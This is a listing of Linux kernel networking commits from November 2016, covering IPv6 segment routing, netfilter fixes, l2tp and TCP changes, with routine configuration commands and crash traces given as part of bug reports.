Commit Graph

44719 Commits

Author SHA1 Message Date
Eric Dumazet
149d6ad836 net: napi_hash_add() is no longer exported
There are no more users except from net/core/dev.c
napi_hash_add() can now be static.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Michael Chan <michael.chan@broadcom.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 21:16:05 -05:00
David Lebrun
a149e7c7ce ipv6: sr: add support for SRH injection through setsockopt
This patch adds support for per-socket SRH injection with the setsockopt
system call through the IPPROTO_IPV6, IPV6_RTHDR options.
The SRH is pushed through the ipv6_push_nfrag_opts function.

Signed-off-by: David Lebrun <david.lebrun@uclouvain.be>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 20:40:06 -05:00
David Lebrun
613fa3ca9e ipv6: add source address argument for ipv6_push_nfrag_opts
This patch prepares for insertion of SRH through setsockopt().
The new source address argument is used when an HMAC field is
present in the SRH, which must be filled. The HMAC signature
process requires the source address as input text.

Signed-off-by: David Lebrun <david.lebrun@uclouvain.be>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 20:40:06 -05:00
David Lebrun
9baee83406 ipv6: sr: add calls to verify and insert HMAC signatures
This patch enables the verification of the HMAC signature for transiting
SR-enabled packets, and its insertion on encapsulated/injected SRH.

Signed-off-by: David Lebrun <david.lebrun@uclouvain.be>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 20:40:06 -05:00
David Lebrun
4f4853dc1c ipv6: sr: implement API to control SR HMAC structure
This patch provides an implementation of the genetlink commands
to associate a given HMAC key identifier with an hashing algorithm
and a secret.

Signed-off-by: David Lebrun <david.lebrun@uclouvain.be>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 20:40:06 -05:00
David Lebrun
bf355b8d2c ipv6: sr: add core files for SR HMAC support
This patch adds the necessary functions to compute and check the HMAC signature
of an SR-enabled packet. Two HMAC algorithms are supported: hmac(sha1) and
hmac(sha256).

In order to avoid dynamic memory allocation for each HMAC computation,
a per-cpu ring buffer is allocated for this purpose.

A new per-interface sysctl called seg6_require_hmac is added, allowing a
user-defined policy for processing HMAC-signed SR-enabled packets.
A value of -1 means that the HMAC field will always be ignored.
A value of 0 means that if an HMAC field is present, its validity will
be enforced (the packet is dropped is the signature is incorrect).
Finally, a value of 1 means that any SR-enabled packet that does not
contain an HMAC signature or whose signature is incorrect will be dropped.

Signed-off-by: David Lebrun <david.lebrun@uclouvain.be>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 20:40:06 -05:00
David Lebrun
6c8702c60b ipv6: sr: add support for SRH encapsulation and injection with lwtunnels
This patch creates a new type of interfaceless lightweight tunnel (SEG6),
enabling the encapsulation and injection of SRH within locally emitted
packets and forwarded packets.

>From a configuration viewpoint, a seg6 tunnel would be configured as follows:

  ip -6 ro ad fc00::1/128 encap seg6 mode encap segs fc42::1,fc42::2,fc42::3 dev eth0

Any packet whose destination address is fc00::1 would thus be encapsulated
within an outer IPv6 header containing the SRH with three segments, and would
actually be routed to the first segment of the list. If `mode inline' was
specified instead of `mode encap', then the SRH would be directly inserted
after the IPv6 header without outer encapsulation.

The inline mode is only available if CONFIG_IPV6_SEG6_INLINE is enabled. This
feature was made configurable because direct header insertion may break
several mechanisms such as PMTUD or IPSec AH.

Signed-off-by: David Lebrun <david.lebrun@uclouvain.be>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 20:40:06 -05:00
David Lebrun
915d7e5e59 ipv6: sr: add code base for control plane support of SR-IPv6
This patch adds the necessary hooks and structures to provide support
for SR-IPv6 control plane, essentially the Generic Netlink commands
that will be used for userspace control over the Segment Routing
kernel structures.

The genetlink commands provide control over two different structures:
tunnel source and HMAC data. The tunnel source is the source address
that will be used by default when encapsulating packets into an
outer IPv6 header + SRH. If the tunnel source is set to :: then an
address of the outgoing interface will be selected as the source.

The HMAC commands currently just return ENOTSUPP and will be implemented
in a future patch.

Signed-off-by: David Lebrun <david.lebrun@uclouvain.be>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 20:40:06 -05:00
David Lebrun
1ababeba4a ipv6: implement dataplane support for rthdr type 4 (Segment Routing Header)
Implement minimal support for processing of SR-enabled packets
as described in
https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-02.

This patch implements the following operations:
- Intermediate segment endpoint: incrementation of active segment and rerouting.
- Egress for SR-encapsulated packets: decapsulation of outer IPv6 header + SRH
  and routing of inner packet.
- Cleanup flag support for SR-inlined packets: removal of SRH if we are the
  penultimate segment endpoint.

A per-interface sysctl seg6_enabled is provided, to accept/deny SR-enabled
packets. Default is deny.

This patch does not provide support for HMAC-signed packets.

Signed-off-by: David Lebrun <david.lebrun@uclouvain.be>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 20:40:06 -05:00
David S. Miller
9fa684ec86 Merge git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf
Pablo Neira Ayuso says:

====================
Netfilter fixes for net

The following patchset contains a larger than usual batch of Netfilter
fixes for your net tree. This series contains a mixture of old bugs and
recently introduced bugs, they are:

1) Fix a crash when using nft_dynset with nft_set_rbtree, which doesn't
   support the set element updates from the packet path. From Liping
   Zhang.

2) Fix leak when nft_expr_clone() fails, from Liping Zhang.

3) Fix a race when inserting new elements to the set hash from the
   packet path, also from Liping.

4) Handle segmented TCP SIP packets properly, basically avoid that the
   INVITE in the allow header create bogus expectations by performing
   stricter SIP message parsing, from Ulrich Weber.

5) nft_parse_u32_check() should return signed integer for errors, from
   John Linville.

6) Fix wrong allocation instead of connlabels, allocate 16 instead of
   32 bytes, from Florian Westphal.

7) Fix compilation breakage when building the ip_vs_sync code with
   CONFIG_OPTIMIZE_INLINING on x86, from Arnd Bergmann.

8) Destroy the new set if the transaction object cannot be allocated,
   also from Liping Zhang.

9) Use device to route duplicated packets via nft_dup only when set by
   the user, otherwise packets may not follow the right route, again
   from Liping.

10) Fix wrong maximum genetlink attribute definition in IPVS, from
    WANG Cong.

11) Ignore untracked conntrack objects from xt_connmark, from Florian
    Westphal.

12) Allow to use conntrack helpers that are registered NFPROTO_UNSPEC
    via CT target, otherwise we cannot use the h.245 helper, from
    Florian.

13) Revisit garbage collection heuristic in the new workqueue-based
    timer approach for conntrack to evict objects earlier, again from
    Florian.

14) Fix crash in nf_tables when inserting an element into a verdict map,
    from Liping Zhang.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 20:38:18 -05:00
Mathias Krause
f567e950bf rtnl: reset calcit fptr in rtnl_unregister()
To avoid having dangling function pointers left behind, reset calcit in
rtnl_unregister(), too.

This is no issue so far, as only the rtnl core registers a netlink
handler with a calcit hook which won't be unregistered, but may become
one if new code makes use of the calcit hook.

Fixes: c7ac8679be ("rtnetlink: Compute and store minimum ifinfo...")
Cc: Jeff Kirsher <jeffrey.t.kirsher@intel.com>
Cc: Greg Rose <gregory.v.rose@intel.com>
Signed-off-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 20:18:19 -05:00
Asbjørn Sloth Tønnesen
3f9b9770b4 net: l2tp: fix negative assignment to unsigned int
recv_seq, send_seq and lns_mode mode are all defined as
unsigned int foo:1;

Signed-off-by: Asbjoern Sloth Toennesen <asbjorn@asbjorn.st>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 18:55:36 -05:00
Asbjørn Sloth Tønnesen
57ceb8611d net: l2tp: cleanup: remove redundant condition
These assignments follow this pattern:

	unsigned int foo:1;
	struct nlattr *nla = info->attrs[bar];

	if (nla)
		foo = nla_get_flag(nla); /* expands to: foo = !!nla */

This could be simplified to: if (nla) foo = 1;
but lets just remove the condition and use the macro,

	foo = nla_get_flag(nla);

Signed-off-by: Asbjoern Sloth Toennesen <asbjorn@asbjorn.st>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 18:55:36 -05:00
Asbjørn Sloth Tønnesen
97b7af097e net: l2tp: netlink: l2tp_nl_tunnel_send: set UDP6 checksum flags
This patch causes the proper attribute flags to be set,
in the case that IPv6 UDP checksums are disabled, so that
userspace ie. `ip l2tp show tunnel` knows about it.

Signed-off-by: Asbjoern Sloth Toennesen <asbjorn@asbjorn.st>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 18:55:36 -05:00
Asbjørn Sloth Tønnesen
7ff516ffe4 net: l2tp: only set L2TP_ATTR_UDP_CSUM if AF_INET
Only set L2TP_ATTR_UDP_CSUM in l2tp_nl_tunnel_send()
when it's running over IPv4.

This prepares the code to also have IPv6 specific attributes.

Signed-off-by: Asbjoern Sloth Toennesen <asbjorn@asbjorn.st>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 18:55:36 -05:00
David Ahern
9d1a6c4ea4 net: icmp_route_lookup should use rt dev to determine L3 domain
icmp_send is called in response to some event. The skb may not have
the device set (skb->dev is NULL), but it is expected to have an rt.
Update icmp_route_lookup to use the rt on the skb to determine L3
domain.

Fixes: 613d09b30f ("net: Use VRF device index for lookups on TX")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 18:49:39 -05:00
Eric Dumazet
d61d072e87 net-gro: avoid reorders
Receiving a GSO packet in dev_gro_receive() is not uncommon
in stacked devices, or devices partially implementing LRO/GRO
like bnx2x. GRO is implementing the aggregation the device
was not able to do itself.

Current code causes reorders, like in following case :

For a given flow where sender sent 3 packets P1,P2,P3,P4

Receiver might receive P1 as a single packet, stored in GRO engine.

Then P2-P4 are received as a single GSO packet, immediately given to
upper stack, while P1 is held in GRO engine.

This patch will make sure P1 is given to upper stack, then P2-P4
immediately after.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 18:48:54 -05:00
Arnd Bergmann
56a62e2218 netfilter: conntrack: fix NF_REPEAT handling
gcc correctly identified a theoretical uninitialized variable use:

net/netfilter/nf_conntrack_core.c: In function 'nf_conntrack_in':
net/netfilter/nf_conntrack_core.c:1125:14: error: 'l4proto' may be used uninitialized in this function [-Werror=maybe-uninitialized]

This could only happen when we 'goto out' before looking up l4proto,
and then enter the retry, implying that l3proto->get_l4proto()
returned NF_REPEAT. This does not currently get returned in any
code path and probably won't ever happen, but is not good to
rely on.

Moving the repeat handling up a little should have the same
behavior as today but avoids the warning by making that case
impossible to enter.

[ I have mangled this original patch to remove the check for tmpl, we
  should inconditionally jump back to the repeat label in case we hit
  NF_REPEAT instead. I have also moved the comment that explains this
  where it belongs. --pablo ]

Fixes: 08733a0cb7 ("netfilter: handle NF_REPEAT from nf_conntrack_in()")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-10 00:19:33 +01:00
Arnd Bergmann
30f5815848 udp: provide udp{4,6}_lib_lookup for nf_socket_ipv{4,6}
Since commit ca065d0cf8 ("udp: no longer use SLAB_DESTROY_BY_RCU")
the udp6_lib_lookup and udp4_lib_lookup functions are only
provided when it is actually possible to call them.

However, moving the callers now caused a link error:

net/built-in.o: In function `nf_sk_lookup_slow_v6':
(.text+0x131a39): undefined reference to `udp6_lib_lookup'
net/ipv4/netfilter/nf_socket_ipv4.o: In function `nf_sk_lookup_slow_v4':
nf_socket_ipv4.c:(.text.nf_sk_lookup_slow_v4+0x114): undefined reference to `udp4_lib_lookup'

This extends the #ifdef so we also provide the functions when
CONFIG_NF_SOCKET_IPV4 or CONFIG_NF_SOCKET_IPV6, respectively
are set.

Fixes: 8db4c5be88 ("netfilter: move socket lookup infrastructure to nf_socket_ipv{4,6}.c")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-10 00:05:14 +01:00
Davide Caratti
0e54d2179f netfilter: conntrack: simplify init/uninit of L4 protocol trackers
modify registration and deregistration of layer-4 protocol trackers to
facilitate inclusion of new elements into the current list of builtin
protocols. Both builtin (TCP, UDP, ICMP) and non-builtin (DCCP, GRE, SCTP,
UDPlite) layer-4 protocol trackers usually register/deregister themselves
using consecutive calls to nf_ct_l4proto_{,pernet}_{,un}register(...).
This sequence is interrupted and rolled back in case of error; in order to
simplify addition of builtin protocols, the input of the above functions
has been modified to allow registering/unregistering multiple protocols.

Signed-off-by: Davide Caratti <dcaratti@redhat.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-09 23:49:25 +01:00
Sebastian Andrzej Siewior
a4fc1bfc42 net/flowcache: Convert to hotplug state machine
Install the callbacks via the state machine. Use multi state support to avoid
custom list handling for the multiple instances.

Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Cc: Steffen Klassert <steffen.klassert@secunet.com>
Cc: Herbert Xu <herbert@gondor.apana.org.au>
Cc: netdev@vger.kernel.org
Cc: rt@linutronix.de
Cc: "David S. Miller" <davem@davemloft.net>
Link: http://lkml.kernel.org/r/20161103145021.28528-10-bigeasy@linutronix.de
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
2016-11-09 23:45:28 +01:00
Sebastian Andrzej Siewior
f0bf90def3 net/dev: Convert to hotplug state machine
Install the callbacks via the state machine.

Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Cc: netdev@vger.kernel.org
Cc: "David S. Miller" <davem@davemloft.net>
Cc: rt@linutronix.de
Link: http://lkml.kernel.org/r/20161103145021.28528-9-bigeasy@linutronix.de
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
2016-11-09 23:45:28 +01:00
Liping Zhang
4e24877e61 netfilter: nf_tables: simplify the basic expressions' init routine
Some basic expressions are built into nf_tables.ko, such as nft_cmp,
nft_lookup, nft_range and so on. But these basic expressions' init
routine is a little ugly, too many goto errX labels, and we forget
to call nft_range_module_exit in the exit routine, although it is
harmless.

Acctually, the init and exit routines of these basic expressions
are same, i.e. do nft_register_expr in the init routine and do
nft_unregister_expr in the exit routine.

So it's better to arrange them into an array and deal with them
together.

Signed-off-by: Liping Zhang <zlpnobody@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-09 23:42:23 +01:00
Pablo Neira Ayuso
f86dab3aa6 netfilter: nft_hash: get random bytes if seed is not specified
If the user doesn't specify a seed, generate one at configuration time.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-09 23:41:09 +01:00
Hadar Hen Zion
75bfbca01e net/sched: act_tunnel_key: Add UDP dst port option
The current tunnel set action supports only IP addresses and key
options. Add UDP dst port option.

Signed-off-by: Hadar Hen Zion <hadarh@mellanox.com>
Signed-off-by: Saeed Mahameed <saeedm@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 13:41:55 -05:00
Hadar Hen Zion
24ba898d43 net/dst: Add dst port to dst_metadata utility functions
Add dst port parameter to __ip_tun_set_dst and __ipv6_tun_set_dst
utility functions.

Signed-off-by: Hadar Hen Zion <hadarh@mellanox.com>
Signed-off-by: Saeed Mahameed <saeedm@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 13:41:54 -05:00
Hadar Hen Zion
f4d997fd61 net/sched: cls_flower: Add UDP port to tunnel parameters
The current IP tunneling classification supports only IP addresses and key.
Enhance UDP based IP tunneling classification parameters by adding UDP
src and dst port.

Signed-off-by: Hadar Hen Zion <hadarh@mellanox.com>
Signed-off-by: Saeed Mahameed <saeedm@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 13:41:54 -05:00
Hadar Hen Zion
519d10521c net/sched: cls_flower: Allow setting encapsulation fields as used key
When encapsulation field is set, mark it as used key for the flow
dissector. This will be used by offloading drivers.

Signed-off-by: Hadar Hen Zion <hadarh@mellanox.com>
Signed-off-by: Saeed Mahameed <saeedm@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 13:41:54 -05:00
Hadar Hen Zion
9ce183b4c4 net/sched: act_tunnel_key: add helper inlines to access tcf_tunnel_key
Needed for drivers to pick the relevant action when offloading tunnel
key act.

Signed-off-by: Hadar Hen Zion <hadarh@mellanox.com>
Signed-off-by: Saeed Mahameed <saeedm@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 13:41:53 -05:00
Lorenzo Colitti
35b80733b3 net: core: add missing check for uid_range in rule_exists.
Without this check, it is not possible to create two rules that
are identical except for their UID ranges. For example:

root@net-test:/# ip rule add prio 1000 lookup 300
root@net-test:/# ip rule add prio 1000 uidrange 100-200 lookup 300
RTNETLINK answers: File exists
root@net-test:/# ip rule add prio 1000 uidrange 100-199 lookup 100
root@net-test:/# ip rule add prio 1000 uidrange 200-299 lookup 200
root@net-test:/# ip rule add prio 1000 uidrange 300-399 lookup 100
RTNETLINK answers: File exists

Tested: https://android-review.googlesource.com/#/c/299980/
Signed-off-by: Lorenzo Colitti <lorenzo@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 13:28:10 -05:00
Maciej Żenczykowski
fb56be83e4 net-ipv6: on device mtu change do not add mtu to mtu-less routes
Routes can specify an mtu explicitly or inherit the mtu from
the underlying device - this inheritance is implemented in
dst->ops->mtu handlers ip6_mtu() and ip6_blackhole_mtu().

Currently changing the mtu of a device adds mtu explicitly
to routes using that device.

ie.
  # ip link set dev lo mtu 65536
  # ip -6 route add local 2000::1 dev lo
  # ip -6 route get 2000::1
  local 2000::1 dev lo  table local  src ...  metric 1024  pref medium

  # ip link set dev lo mtu 65535
  # ip -6 route get 2000::1
  local 2000::1 dev lo  table local  src ...  metric 1024  mtu 65535 pref medium

  # ip link set dev lo mtu 65536
  # ip -6 route get 2000::1
  local 2000::1 dev lo  table local  src ...  metric 1024  mtu 65536 pref medium

  # ip -6 route del local 2000::1

After this patch the route entry no longer changes unless it already has an mtu.
There is no need: this inheritance is already done in ip6_mtu()

  # ip link set dev lo mtu 65536
  # ip -6 route add local 2000::1 dev lo
  # ip -6 route add local 2000::2 dev lo mtu 2000
  # ip -6 route get 2000::1; ip -6 route get 2000::2
  local 2000::1 dev lo  table local  src ...  metric 1024  pref medium
  local 2000::2 dev lo  table local  src ...  metric 1024  mtu 2000 pref medium

  # ip link set dev lo mtu 65535
  # ip -6 route get 2000::1; ip -6 route get 2000::2
  local 2000::1 dev lo  table local  src ...  metric 1024  pref medium
  local 2000::2 dev lo  table local  src ...  metric 1024  mtu 2000 pref medium

  # ip link set dev lo mtu 1501
  # ip -6 route get 2000::1; ip -6 route get 2000::2
  local 2000::1 dev lo  table local  src ...  metric 1024  pref medium
  local 2000::2 dev lo  table local  src ...  metric 1024  mtu 1501 pref medium

  # ip link set dev lo mtu 65536
  # ip -6 route get 2000::1; ip -6 route get 2000::2
  local 2000::1 dev lo  table local  src ...  metric 1024  pref medium
  local 2000::2 dev lo  table local  src ...  metric 1024  mtu 65536 pref medium

  # ip -6 route del local 2000::1
  # ip -6 route del local 2000::2

This is desirable because changing device mtu and then resetting it
to the previous value shouldn't change the user visible routing table.

Signed-off-by: Maciej Żenczykowski <maze@google.com>
CC: Eric Dumazet <edumazet@google.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 13:19:32 -05:00
Soheil Hassas Yeganeh
3023898b7d sock: fix sendmmsg for partial sendmsg
Do not send the next message in sendmmsg for partial sendmsg
invocations.

sendmmsg assumes that it can continue sending the next message
when the return value of the individual sendmsg invocations
is positive. It results in corrupting the data for TCP,
SCTP, and UNIX streams.

For example, sendmmsg([["abcd"], ["efgh"]]) can result in a stream
of "aefgh" if the first sendmsg invocation sends only the first
byte while the second sendmsg goes through.

Datagram sockets either send the entire datagram or fail, so
this patch affects only sockets of type SOCK_STREAM and
SOCK_SEQPACKET.

Fixes: 228e548e60 ("net: Add sendmmsg socket system call")
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Willem de Bruijn <willemb@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 13:18:12 -05:00
Eric Dumazet
67db3e4bfb tcp: no longer hold ehash lock while calling tcp_get_info()
We had various problems in the past in tcp_get_info() and used
specific synchronization to avoid deadlocks.

We would like to add more instrumentation points for TCP, and
avoiding grabing socket lock in tcp_getinfo() was too costly.

Being able to lock the socket allows to provide consistent set
of fields.

inet_diag_dump_icsk() can make sure ehash locks are not
held any more when tcp_get_info() is called.

We can remove syncp added in commit d654976cbf
("tcp: fix a potential deadlock in tcp_get_info()"), but we need
to use lock_sock_fast() instead of spin_lock_bh() since TCP input
path can now be run from process context.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Acked-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 13:02:27 -05:00
Eric Dumazet
ccbf3bfaee tcp: shortcut listeners in tcp_get_info()
Being lockless in tcp_get_info() is hard, because we need to add
specific synchronization in TCP fast path, like seqcount.

Following patch will change inet_diag_dump_icsk() to no longer
hold any lock for non listeners, so that we can properly acquire
socket lock in get_tcp_info() and let it return more consistent counters.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Acked-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 13:02:27 -05:00
Sowmini Varadhan
117d15bbfd RDS: TCP: start multipath acceptor loop at 0
The for() loop in rds_tcp_accept_one() assumes that the 0'th
rds_tcp_conn_path is UP and starts multipath accepts at index 1.
But this assumption may not always be true: if the 0'th path
has failed (ERROR or DOWN state) an incoming connection request
should be used to resurrect this path.

Signed-off-by: Sowmini Varadhan <sowmini.varadhan@oracle.com>
Acked-by: Santosh Shilimkar <santosh.shilimkar@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 12:47:49 -05:00
Sowmini Varadhan
1ac507d4ff RDS: TCP: report addr/port info based on TCP socket in rds-info
The socket argument passed to rds_tcp_tc_info() is a PF_RDS socket,
so it is incorrect to report the address port info based on
rds_getname() as part of TCP state report.

Invoke inet_getname() for the t_sock associated with the
rds_tcp_connection instead.

Signed-off-by: Sowmini Varadhan <sowmini.varadhan@oracle.com>
Acked-by: Santosh Shilimkar <santosh.shilimkar@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-09 12:47:49 -05:00
Liping Zhang
58c78e104d netfilter: nf_tables: fix oops when inserting an element into a verdict map
Dalegaard says:
 The following ruleset, when loaded with 'nft -f bad.txt'
 ----snip----
 flush ruleset
 table ip inlinenat {
   map sourcemap {
     type ipv4_addr : verdict;
   }

   chain postrouting {
     ip saddr vmap @sourcemap accept
   }
 }
 add chain inlinenat test
 add element inlinenat sourcemap { 100.123.10.2 : jump test }
 ----snip----

 results in a kernel oops:
 BUG: unable to handle kernel paging request at 0000000000001344
 IP: [<ffffffffa07bf704>] nf_tables_check_loops+0x114/0x1f0 [nf_tables]
 [...]
 Call Trace:
  [<ffffffffa07c2aae>] ? nft_data_init+0x13e/0x1a0 [nf_tables]
  [<ffffffffa07c1950>] nft_validate_register_store+0x60/0xb0 [nf_tables]
  [<ffffffffa07c74b5>] nft_add_set_elem+0x545/0x5e0 [nf_tables]
  [<ffffffffa07bfdd0>] ? nft_table_lookup+0x30/0x60 [nf_tables]
  [<ffffffff8132c630>] ? nla_strcmp+0x40/0x50
  [<ffffffffa07c766e>] nf_tables_newsetelem+0x11e/0x210 [nf_tables]
  [<ffffffff8132c400>] ? nla_validate+0x60/0x80
  [<ffffffffa030d9b4>] nfnetlink_rcv+0x354/0x5a7 [nfnetlink]

Because we forget to fill the net pointer in bind_ctx, so dereferencing
it may cause kernel crash.

Reported-by: Dalegaard <dalegaard@gmail.com>
Signed-off-by: Liping Zhang <zlpnobody@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-08 23:53:39 +01:00
Florian Westphal
e0df8cae6c netfilter: conntrack: refine gc worker heuristics
Nicolas Dichtel says:
  After commit b87a2f9199 ("netfilter: conntrack: add gc worker to
  remove timed-out entries"), netlink conntrack deletion events may be
  sent with a huge delay.

Nicolas further points at this line:

  goal = min(nf_conntrack_htable_size / GC_MAX_BUCKETS_DIV, GC_MAX_BUCKETS);

and indeed, this isn't optimal at all.  Rationale here was to ensure that
we don't block other work items for too long, even if
nf_conntrack_htable_size is huge.  But in order to have some guarantee
about maximum time period where a scan of the full conntrack table
completes we should always use a fixed slice size, so that once every
N scans the full table has been examined at least once.

We also need to balance this vs. the case where the system is either idle
(i.e., conntrack table (almost) empty) or very busy (i.e. eviction happens
from packet path).

So, after some discussion with Nicolas:

1. want hard guarantee that we scan entire table at least once every X s
-> need to scan fraction of table (get rid of upper bound)

2. don't want to eat cycles on idle or very busy system
-> increase interval if we did not evict any entries

3. don't want to block other worker items for too long
-> make fraction really small, and prefer small scan interval instead

4. Want reasonable short time where we detect timed-out entry when
system went idle after a burst of traffic, while not doing scans
all the time.
-> Store next gc scan in worker, increasing delays when no eviction
happened and shrinking delay when we see timed out entries.

The old gc interval is turned into a max number, scans can now happen
every jiffy if stale entries are present.

Longest possible time period until an entry is evicted is now 2 minutes
in worst case (entry expires right after it was deemed 'not expired').

Reported-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Signed-off-by: Florian Westphal <fw@strlen.de>
Acked-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-08 23:53:38 +01:00
Florian Westphal
6114cc516d netfilter: conntrack: fix CT target for UNSPEC helpers
Thomas reports its not possible to attach the H.245 helper:

iptables -t raw -A PREROUTING -p udp -j CT --helper H.245
iptables: No chain/target/match by that name.
xt_CT: No such helper "H.245"

This is because H.245 registers as NFPROTO_UNSPEC, but the CT target
passes NFPROTO_IPV4/IPV6 to nf_conntrack_helper_try_module_get.

We should treat UNSPEC as wildcard and ignore the l3num instead.

Reported-by: Thomas Woerner <twoerner@redhat.com>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-08 23:53:37 +01:00
Florian Westphal
fb9c9649a1 netfilter: connmark: ignore skbs with magic untracked conntrack objects
The (percpu) untracked conntrack entries can end up with nonzero connmarks.

The 'untracked' conntrack objects are merely a way to distinguish INVALID
(i.e. protocol connection tracker says payload doesn't meet some
requirements or packet was never seen by the connection tracking code)
from packets that are intentionally not tracked (some icmpv6 types such as
neigh solicitation, or by using 'iptables -j CT --notrack' option).

Untracked conntrack objects are implementation detail, we might as well use
invalid magic address instead to tell INVALID and UNTRACKED apart.

Check skb->nfct for untracked dummy and behave as if skb->nfct is NULL.

Reported-by: XU Tianwen <evan.xu.tianwen@gmail.com>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-08 23:53:36 +01:00
WANG Cong
8fbfef7f50 ipvs: use IPVS_CMD_ATTR_MAX for family.maxattr
family.maxattr is the max index for policy[], the size of
ops[] is determined with ARRAY_SIZE().

Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Cc: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Simon Horman <horms@verge.net.au>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-08 23:53:30 +01:00
Linus Lüssing
9b4aec647a batman-adv: fix rare race conditions on interface removal
In rare cases during shutdown the following general protection fault can
happen:

  general protection fault: 0000 [#1] SMP
  Modules linked in: batman_adv(O-) [...]
  CPU: 3 PID: 1714 Comm: rmmod Tainted: G           O    4.6.0-rc6+ #1
  [...]
  Call Trace:
   [<ffffffffa0363294>] batadv_hardif_disable_interface+0x29a/0x3a6 [batman_adv]
   [<ffffffffa0373db4>] batadv_softif_destroy_netlink+0x4b/0xa4 [batman_adv]
   [<ffffffff813b52f3>] __rtnl_link_unregister+0x48/0x92
   [<ffffffff813b9240>] rtnl_link_unregister+0xc1/0xdb
   [<ffffffff8108547c>] ? bit_waitqueue+0x87/0x87
   [<ffffffffa03850d2>] batadv_exit+0x1a/0xf48 [batman_adv]
   [<ffffffff810c26f9>] SyS_delete_module+0x136/0x1b0
   [<ffffffff8144dc65>] entry_SYSCALL_64_fastpath+0x18/0xa8
   [<ffffffff8108aaca>] ? trace_hardirqs_off_caller+0x37/0xa6
  Code: 89 f7 e8 21 bd 0d e1 4d 85 e4 75 0e 31 f6 48 c7 c7 50 d7 3b a0 e8 50 16 f2 e0 49 8b 9c 24 28 01 00 00 48 85 db 0f 84 b2 00 00 00 <48> 8b 03 4d 85 ed 48 89 45 c8 74 09 4c 39 ab f8 00 00 00 75 1c
  RIP  [<ffffffffa0371852>] batadv_purge_outstanding_packets+0x1c8/0x291 [batman_adv]
   RSP <ffff88001da5fd78>
  ---[ end trace 803b9bdc6a4a952b ]---
  Kernel panic - not syncing: Fatal exception in interrupt
  Kernel Offset: disabled
  ---[ end Kernel panic - not syncing: Fatal exception in interrupt

